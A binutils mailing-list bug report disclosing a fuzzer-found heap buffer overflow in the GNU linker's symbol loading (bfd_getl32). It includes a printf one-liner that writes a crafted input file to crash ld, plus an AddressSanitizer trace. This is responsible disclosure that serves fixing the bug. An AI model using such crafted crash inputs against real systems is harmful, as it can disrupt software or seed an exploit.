[Bug ld/20925] New: LD: Buffer Overflow when loading symbols (2)

[boehme.marcel at gmail dot com]

https://sourceware.org/bugzilla/show_bug.cgi?id=20925

            Bug ID: 20925
           Summary: LD: Buffer Overflow when loading symbols (2)
           Product: binutils
           Version: 2.28 (HEAD)
            Status: UNCONFIRMED
          Severity: normal
          Priority: P2
         Component: ld
          Assignee: unassigned at sourceware dot org
          Reporter: boehme.marcel at gmail dot com
  Target Milestone: ---

Dear all,

The following bug was found with AFLFast, a fork of AFL, in a 24 hour fuzzing
session on Binutils. Thanks also to Van-Thuan Pham.

The is a heap-based buffer overflow in the linker that does *not* actually
crash the linker for Binutils in trunk. The execution crashes for the
preinstalled versions v2.26.1 and v2.24 of Binutils on Ubuntu 16.04 and 14.04,
though, as well as printing an assertion failure.

This bug might also be related to PR20909 and PR20924 but the overflow is
located in a different function (bfd_getl32).

$ printf
"\x08\x01\x00\x00\x08\x00\x00\x00\x04\x00\x00\x00\x00\xef\x01\x72\x60\x00\x00\x00\x00\x10\x02\xf1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x23\x00\xee\xff\x00\x00\x00\x7f\x00\x02\x00\x00\x00\x64\x00\x00\x00\x44\xf3\x0a\x00\x06\x00\x00\x00\x01\x00\x00\x00\x7f\xf7\x27\x60\x00\x00\x00\x00\x14\x02\x5a\x00\x44\xe5\x0a\x00\x06\x00\x00\x00\x0b0\xff\xff0000\x05\x00\x00\x00\x00\xf1\x00\x18\x00\xf7\x23\x60\x00\x00\x00\x00\x18\x80\xff\x00\x44\xf1\x0a\x00\x02\x00\x00\x00\x18\x00\x5a\x00\x44\xe5\x0a\x00\x06\x00\x00\x00\x0b\x0a\xff\xff\xff\xff\x00\x00\x08\x00\x00\x00\x00\xf1\x00\x18\xe1\x5a"
> test
$ ./ld test
..

ASAN says:
READ of size 1 at 0x60800000bf80 thread T0
    #0 0x517519 in bfd_getl32 ../../bfd/libbfd.c:548
    #1 0x76844d in aout_link_add_symbols ../../bfd/aoutx.h:3095
    #2 0x7698e8 in aout_link_add_object_symbols ../../bfd/aoutx.h:3227
    #3 0x76ac36 in aout_32_link_add_symbols ../../bfd/aoutx.h:3488
    #4 0x438d89 in load_symbols ../../ld/ldlang.c:2897
    #5 0x43c299 in open_input_bfds ../../ld/ldlang.c:3346
    #6 0x4568f7 in lang_process ../../ld/ldlang.c:6871
    #7 0x465d20 in main ../../ld/ldmain.c:428
    #8 0x7f2dcac40f44 in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
    #9 0x403968 
(/home/ubuntu/subjects/binutils-gdb_fixed/obj-asan/ld/ld-new+0x403968)

0x60800000bf80 is located 0 bytes to the right of 96-byte region
[0x60800000bf20,0x60800000bf80)
allocated by thread T0 here:
    #0 0x7f2dcbfc13a8 in __interceptor_malloc
(/usr/lib/x86_64-linux-gnu/libasan.so.3+0xc23a8)
    #1 0x516762 in bfd_malloc ../../bfd/libbfd.c:184
    #2 0x75945f in aout_get_external_symbols ../../bfd/aoutx.h:1323
    #3 0x7698c7 in aout_link_add_object_symbols ../../bfd/aoutx.h:3225
    #4 0x76ac36 in aout_32_link_add_symbols ../../bfd/aoutx.h:3488
    #5 0x438d89 in load_symbols ../../ld/ldlang.c:2897
    #6 0x43c299 in open_input_bfds ../../ld/ldlang.c:3346
    #7 0x4568f7 in lang_process ../../ld/ldlang.c:6871
    #8 0x465d20 in main ../../ld/ldmain.c:428
    #9 0x7f2dcac40f44 in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x21f44)

SUMMARY: AddressSanitizer: heap-buffer-overflow ../../bfd/libbfd.c:548 in
bfd_getl32

Best regards,
- Marcel

-- 
You are receiving this mail because:
You are on the CC list for the bug.
_______________________________________________
bug-binutils mailing list
bug-binutils@gnu.org
https://lists.gnu.org/mailman/listinfo/bug-binutils